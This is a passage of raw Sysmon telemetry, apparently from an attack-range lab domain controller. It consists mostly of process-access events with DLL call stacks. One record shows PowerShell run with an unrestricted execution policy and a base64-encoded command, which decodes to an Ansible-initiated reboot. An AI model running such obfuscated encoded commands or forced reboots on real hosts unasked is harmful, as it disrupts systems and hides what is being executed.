STEM32\ntdll.dll+51791 10341000x8000000000000000524Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.685{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000523Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.685{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000522Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.685{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000521Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.685{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000520Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.685{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000519Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.685{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000518Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.685{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000517Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.685{D28789B6-7AC1-5FA1-0500-000000008701}6361160C:\Windows\system32\csrss.exe{D28789B6-7C40-5FA1-0E03-000000008701}2188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000516Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.685{D28789B6-7C40-5FA1-0D03-000000008701}33242696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7C40-5FA1-0E03-000000008701}2188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+911a32d8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+90644162(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+90643e33(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+910f5498(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+906049c9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+90662e98(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+906464fd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+906464fd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+9064638e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+90638313(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+90644846(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+90644439(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+90644162(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+90643e33(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+910f5498(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+9062ac94(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+9062a264(wow64) 154100x8000000000000000515Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.690{D28789B6-7C40-5FA1-0E03-000000008701}2188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UwBlAHQALQBTAHQAcgBpAGMAdABNAG8AZABlACAALQBWAGUAcgBzAGkAbwBuACAATABhAHQAZQBzAHQACgBzAGgAdQB0AGQAbwB3AG4AIAAvAHIAIAAvAHQAIAAyACAALwBjACAAIgBSAGUAYgBvAG8AdAAgAGkAbgBpAHQAaQBhAHQAZQBkACAAYgB5ACAAQQBuAHMAaQBiAGwAZQAiAAoASQBmACAAKAAtAG4AbwB0ACAAJAA/ACkAIAB7ACAASQBmACAAKABHAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAEwAQQBTAFQARQBYAEkAVABDAE8ARABFACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAIAB7ACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUAIAB9ACAARQBsAHMAZQAgAHsAIABlAHgAaQB0ACAAMQAgAH0AIAB9AA==C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7C40-5FA1-CF12-110000000000}0x1112cf0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7C40-5FA1-0D03-000000008701}3324C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAVQB3AEIAbABBAEgAUQBBAEwAUQBCAFQAQQBIAFEAQQBjAGcAQgBwAEEARwBNAEEAZABBAEIATgBBAEcAOABBAFoAQQBCAGwAQQBDAEEAQQBMAFEAQgBXAEEARwBVAEEAYwBnAEIAegBBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBUAEEAQgBoAEEASABRAEEAWgBRAEIAegBBAEgAUQBBAEMAZwBCAHoAQQBHAGcAQQBkAFEAQgAwAEEARwBRAEEAYgB3AEIAMwBBAEcANABBAEkAQQBBAHYAQQBIAEkAQQBJAEEAQQB2AEEASABRAEEASQBBAEEAeQBBAEMAQQBBAEwAdwBCAGoAQQBDAEEAQQBJAGcAQgBTAEEARwBVAEEAWQBnAEIAdgBBAEcAOABBAGQAQQBBAGcAQQBHAGsAQQBiAGcAQgBwAEEASABRAEEAYQBRAEIAaABBAEgAUQBBAFoAUQBCAGsAQQBDAEEAQQBZAGcAQgA1AEEAQwBBAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBpAEEAQQBvAEEAUwBRAEIAbQBBAEMAQQBBAEsAQQBBAHQAQQBHADQAQQBiAHcAQgAwAEEAQwBBAEEASgBBAEEALwBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBTAFEAQgBtAEEAQwBBAEEASwBBAEIASABBAEcAVQBBAGQAQQBBAHQAQQBGAFkAQQBZAFEAQgB5AEEARwBrAEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAGcAQQBFAHcAQQBRAFEAQgBUAEEARgBRAEEAUgBRAEIAWQBBAEUAawBBAFYAQQBCAEQAQQBFADgAQQBSAEEAQgBGAEEAQwBBAEEATABRAEIARgBBAEgASQBBAGMAZwBCAHYAQQBIAEkAQQBRAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEkAQQBCAFQAQQBHAGsAQQBiAEEAQgBsAEEARwA0AEEAZABBAEIAcwBBAEgAawBBAFEAdwBCAHYAQQBHADQAQQBkAEEAQgBwAEEARwA0AEEAZABRAEIAbABBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBaAFEAQgA0AEEARwBrAEEAZABBAEEAZwBBAEMAUQBBAFQAQQBCAEIAQQBGAE0AQQBWAEEAQgBGAEEARgBnAEEAUwBRAEIAVQBBAEUATQBBAFQAdwBCAEUAQQBFAFUAQQBJAEEAQgA5AEEAQwBBAEEAUgBRAEIAcwBBAEgATQBBAFoAUQBBAGcAQQBIAHMAQQBJAEEAQgBsAEEASABnAEEAYQBRAEIAMABBAEMAQQBBAE0AUQBBAGcAQQBIADAAQQBJAEEAQgA5AEEAQQA9AD0A 10341000x8000000000000000514Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.607{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7C40-5FA1-0D03-000000008701}3324C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000513Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.607{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7C40-5FA1-0D03-000000008701}3324C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000512Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.560{D28789B6-7C40-5FA1-0D03-000000008701}3324C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_exh2hqqs.iiu.ps12020-11-03 15:50:24.560 10341000x8000000000000000511Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.560{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C40-5FA1-0D03-000000008701}3324C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000510Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.528{D28789B6-7C40-5FA1-0903-000000008701}32084428C:\Windows\system32\conhost.exe{D28789B6-7C40-5FA1-0D03-000000008701}3324C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000509Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.528{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000508Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.528{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000507Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.528{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000506Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.528{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000505Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.528{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000504Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 